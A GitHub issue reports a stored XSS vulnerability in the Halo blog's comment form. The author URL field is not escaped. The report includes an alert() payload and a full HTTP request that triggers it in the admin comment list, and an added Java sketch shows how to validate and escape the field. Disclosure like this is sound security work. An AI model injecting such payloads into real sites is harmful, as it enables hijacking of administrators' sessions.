There is another stored XSS vulnerability #127

Closed
4 of 6 tasks
Artemis1029 opened this issue Apr 4, 2019 · 2 comments
Labels
kind/bug Categorizes issue or PR as related to a bug. vulnerability Vulnerability

Artemis1029 commented Apr 4, 2019

I confirm that I have checked (mark [ ] as [x])


I am submitting (mark [ ] as [x])

  • Bug report
  • Add a new feature or functionality
  • Request technical support

Bug Report

I find that you have done HtmlUtil.escape for CommentContent
but do nothing with CommentAuthorUrl

payload: commentAuthorUrl="><img src=1 onerror=alert(123)>

POST /newComment HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 306
Connection: close
Cookie: JSESSIONID=
X-Forwarded-For: 127.0.0.2

postId=3&commentContent=sasas&commentAuthor=as12%22%3E%3Ca%3E3&commentAuthorEmail=&commentAuthorUrl=%22%3E%3Cimg+src%3D1+onerror%3Dalert(123)%3E233&commentAgent=Mozilla%2F5.0+(Windows+NT+10.0%3B+Win64%3B+x64)+AppleWebKit%2F537.36+(KHTML%2C+like+Gecko)+Chrome%2F73.0.3683.47+Safari%2F537.36&commentParent=28

in URI /admin/comments?status=1
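An added example, not part of the original report and not Halo's own code: one way to close the gap described above is to validate commentAuthorUrl when the comment is stored and to HTML-escape it again when the admin comment list is rendered. The class and method names are hypothetical, and the sketch assumes the URL is emitted inside a quoted href attribute.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;

public class CommentAuthorUrlCheck { // hypothetical class, JDK only
    /** Minimal HTML escaper for text and quoted-attribute contexts. */
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#39;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    /** Returns raw if it is an absolute http(s) URL with a host, else "" (optional field). */
    static String sanitizeAuthorUrl(String raw) {
        if (raw == null || raw.trim().isEmpty()) return "";
        try {
            URI uri = new URI(raw.trim());
            String scheme = uri.getScheme();
            if (scheme == null || uri.getHost() == null) return "";
            scheme = scheme.toLowerCase(Locale.ROOT);
            return (scheme.equals("http") || scheme.equals("https")) ? uri.toASCIIString() : "";
        } catch (URISyntaxException e) {
            return ""; // characters such as " < > and spaces are illegal in a URI
        }
    }

    public static void main(String[] args) {
        String[] samples = { // constructed inputs; the first is the decoded value from the report
            "\"><img src=1 onerror=alert(123)>233",
            "javascript:alert(123)",
            "https://example.com/?a=1&b=2"
        };
        for (String s : samples) {
            String stored = sanitizeAuthorUrl(s); // at write time (/newComment)
            String html = "<a href=\"" + escapeHtml(stored) + "\">author</a>"; // at render time
            System.out.println(html);
        }
    }
}
```

The first two samples are stored as an empty string; the third is kept, and its `&` is rendered as `&amp;` inside the attribute.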

JohnNiang (Member) commented

Thank you very much for the vulnerability report! We will fix it in version v1.0.

JohnNiang added the kind/bug label Apr 4, 2019
JohnNiang added this to To do in Halo-v1 progress via automation Apr 4, 2019
JohnNiang added the vulnerability label Apr 4, 2019
MyFaith closed this as completed Apr 7, 2019
Halo-v1 progress automation moved this from To do to Done Apr 7, 2019
MyFaith reopened this Apr 7, 2019
Halo-v1 progress automation moved this from Done to In progress Apr 7, 2019
MyFaith moved this from In progress to To do in Halo-v1 progress Apr 7, 2019
JohnNiang removed this from To do in Halo-v1 progress May 21, 2019
ruibaby (Member) commented May 28, 2019

Preparing to release v1, so closing this issue.
